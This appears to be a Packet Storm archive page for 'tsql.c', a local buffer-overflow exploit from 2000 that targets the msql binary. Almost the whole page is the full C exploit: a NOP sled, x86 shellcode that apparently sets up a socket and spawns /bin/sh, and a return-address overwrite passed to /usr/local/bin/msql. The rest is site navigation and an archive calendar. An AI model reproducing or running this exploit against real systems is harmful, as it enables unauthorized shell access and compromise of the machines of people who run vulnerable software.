what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

tsql.c

tsql.c
Posted Sep 28, 2000

Msql local overflow. Author Unknown.

tags | exploit, overflow, local
SHA-256 | 81796ff3a161a4cde169f1cb7ef819ce2c73aa637619778652826eaeb3db1e5d

tsql.c

Change Mirror Download
#include <unistd.h> 
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define MSQL_PATH "/usr/local/bin/msql"
#define BUFFER_SIZE 999
#define DEFAULT_OFFSET 0

#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
"\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
"\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
"\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
"\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
"\xb3\x04\xcd\x80\xeb\x04\xeb\x48\xeb\x4e\x31\xc0\x89\x46\x04\x89"
"\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
"\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xc7\x06\x2f\x62"
"\x69\x6e\xc7\x46\x04\x2f\x73\x68\x21\x31\xc0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5f\xff\xff\xff";

unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i,off = DEFAULT_OFFSET;


buff = malloc(2048);
ptr = buff;

for (i = 0; i <= BUFFER_SIZE ;i+=NOP_SIZE) {
memcpy (ptr,nop,NOP_SIZE);
ptr+=NOP_SIZE;
}

for(i=0;i < strlen(shellcode);i++)
*(ptr++) = shellcode[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_sp()+off;
ptr = (char *)addr_ptr;
*ptr = 0;
printf("Using address: 0x%x\n", get_sp);
execl(MSQL_PATH, "msql",buff, NULL);
}
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    36 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close